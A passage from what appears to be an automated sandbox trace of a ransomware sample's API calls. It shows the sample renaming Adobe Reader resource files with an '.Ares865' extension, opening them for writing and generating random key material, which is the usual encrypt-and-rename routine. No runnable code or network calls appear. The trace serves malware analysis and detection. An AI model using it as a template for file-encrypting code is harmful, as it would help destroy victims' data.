(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=107520) returned 1 [0156.192] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.193] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.193] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.202] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.204] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="can03.ths" | out: lpString1="can03.ths") returned="can03.ths" [0156.204] lstrlenW (lpString="can03.ths") returned 9 [0156.204] lstrlenW (lpString="Ares865") returned 7 [0156.204] lstrcmpiW (lpString1="n03.ths", lpString2="Ares865") returned 1 [0156.205] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths.Ares865") returned 105 [0156.205] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can03.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can03.ths.ares865"), dwFlags=0x1) returned 1 [0156.207] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can03.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can03.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=662528) returned 1 [0156.207] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.208] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.208] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.248] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.249] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.249] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.258] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="can129.hsp" | out: lpString1="can129.hsp") returned="can129.hsp" [0156.258] lstrlenW (lpString="can129.hsp") returned 10 [0156.258] lstrlenW (lpString="Ares865") returned 7 [0156.258] lstrcmpiW (lpString1="129.hsp", lpString2="Ares865") returned -1 [0156.259] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp.Ares865") returned 106 [0156.259] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can129.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can129.hsp.ares865"), dwFlags=0x1) returned 1 [0156.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can129.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=285757) returned 1 [0156.262] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.277] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.278] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.278] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.282] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="can32.clx" | out: lpString1="can32.clx") returned="can32.clx" [0156.282] lstrlenW (lpString="can32.clx") returned 9 [0156.282] lstrlenW (lpString="Ares865") returned 7 [0156.282] lstrcmpiW (lpString1="n32.clx", lpString2="Ares865") returned 1 [0156.282] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx.Ares865") returned 105 [0156.282] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can32.clx.ares865"), dwFlags=0x1) returned 1 [0156.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.284] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0156.285] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.285] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.285] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.289] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.290] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.291] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cfr.fca" | out: lpString1="cfr.fca") returned="cfr.fca" [0156.291] lstrlenW (lpString="cfr.fca") returned 7 [0156.291] lstrlenW (lpString="Ares865") returned 7 [0156.291] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca.Ares865") returned 103 [0156.291] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.fca.ares865"), dwFlags=0x1) returned 1 [0156.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1780) returned 1 [0156.294] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.295] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.295] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.297] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.298] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.298] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.298] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cfr.hyp" | out: lpString1="cfr.hyp") returned="cfr.hyp" [0156.298] lstrlenW (lpString="cfr.hyp") returned 7 [0156.298] lstrlenW (lpString="Ares865") returned 7 [0156.299] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp.Ares865") returned 103 [0156.299] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.hyp.ares865"), dwFlags=0x1) returned 1 [0156.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.301] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0156.302] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.308] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.308] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.311] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.312] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cfr32.clx" | out: lpString1="cfr32.clx") returned="cfr32.clx" [0156.312] lstrlenW (lpString="cfr32.clx") returned 9 [0156.312] lstrlenW (lpString="Ares865") returned 7 [0156.312] lstrcmpiW (lpString1="r32.clx", lpString2="Ares865") returned 1 [0156.313] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx.Ares865") returned 105 [0156.313] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr32.clx.ares865"), dwFlags=0x1) returned 1 [0156.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.315] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0156.316] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.322] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cfr68.hsp" | out: lpString1="cfr68.hsp") returned="cfr68.hsp" [0156.322] lstrlenW (lpString="cfr68.hsp") returned 9 [0156.322] lstrlenW (lpString="Ares865") returned 7 [0156.322] lstrcmpiW (lpString1="r68.hsp", lpString2="Ares865") returned 1 [0156.323] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp.Ares865") returned 105 [0156.323] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr68.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr68.hsp.ares865"), dwFlags=0x1) returned 1 [0156.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr68.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=238161) returned 1 [0156.335] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.350] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.351] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.351] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.355] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cfr95.ths" | out: lpString1="cfr95.ths") returned="cfr95.ths" [0156.355] lstrlenW (lpString="cfr95.ths") returned 9 [0156.355] lstrlenW (lpString="Ares865") returned 7 [0156.355] lstrcmpiW (lpString1="r95.ths", lpString2="Ares865") returned 1 [0156.355] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths.Ares865") returned 105 [0156.355] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr95.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr95.ths.ares865"), dwFlags=0x1) returned 1 [0156.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr95.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.358] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=313344) returned 1 [0156.358] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.378] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.378] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.383] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="ctl.fca" | out: lpString1="ctl.fca") returned="ctl.fca" [0156.383] lstrlenW (lpString="ctl.fca") returned 7 [0156.383] lstrlenW (lpString="Ares865") returned 7 [0156.383] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca.Ares865") returned 103 [0156.383] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.fca.ares865"), dwFlags=0x1) returned 1 [0156.387] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=788) returned 1 [0156.387] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.390] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.391] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.391] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.392] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="ctl.hyp" | out: lpString1="ctl.hyp") returned="ctl.hyp" [0156.392] lstrlenW (lpString="ctl.hyp") returned 7 [0156.392] lstrlenW (lpString="Ares865") returned 7 [0156.392] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp.Ares865") returned 103 [0156.392] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.hyp.ares865"), dwFlags=0x1) returned 1 [0156.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.394] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9216) returned 1 [0156.394] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.398] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.399] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="ctl28.hsp" | out: lpString1="ctl28.hsp") returned="ctl28.hsp" [0156.399] lstrlenW (lpString="ctl28.hsp") returned 9 [0156.400] lstrlenW (lpString="Ares865") returned 7 [0156.400] lstrcmpiW (lpString1="l28.hsp", lpString2="Ares865") returned 1 [0156.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp.Ares865") returned 105 [0156.400] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl28.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl28.hsp.ares865"), dwFlags=0x1) returned 1 [0156.402] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl28.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl28.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.402] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=284831) returned 1 [0156.402] CryptAcquireContextW (in: 